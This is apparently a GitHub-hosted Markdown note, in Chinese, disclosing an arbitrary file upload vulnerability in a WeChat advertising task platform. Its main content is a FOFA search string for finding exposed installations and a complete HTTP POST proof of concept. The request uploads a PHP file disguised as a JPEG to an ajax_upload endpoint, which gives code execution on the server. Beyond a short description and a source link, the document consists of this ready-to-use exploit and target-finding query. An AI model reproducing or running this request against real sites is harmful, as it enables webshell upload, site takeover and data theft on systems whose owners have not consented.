微信广告任务平台存在任意文件上传漏洞

微信广告任务平台存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。

fofa

"/tpl/Public/js/func.js"

poc

注意这里需要普通用户登录之后操作.

POST /index.php/Home/index/ajax_upload HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCc7iBZFp1mvojsxn
Accept: */*
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php/Home/Index/index.html
Cookie: think_language=zh-CN; BJYADMIN=2150gjbkj92r835kg2dn9u9i75
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.0.0 Safari/537.36

------WebKitFormBoundaryCc7iBZFp1mvojsxn
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundaryCc7iBZFp1mvojsxn--

漏洞来源

https://mp.weixin.qq.com/s/t3guPQ6s2GCMU4xZPmEeYw

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

微信广告任务平台存在任意文件上传漏洞.md

微信广告任务平台存在任意文件上传漏洞.md

微信广告任务平台存在任意文件上传漏洞

fofa

poc

漏洞来源

Files

微信广告任务平台存在任意文件上传漏洞.md

Latest commit

History

微信广告任务平台存在任意文件上传漏洞.md

File metadata and controls

微信广告任务平台存在任意文件上传漏洞

fofa

poc

漏洞来源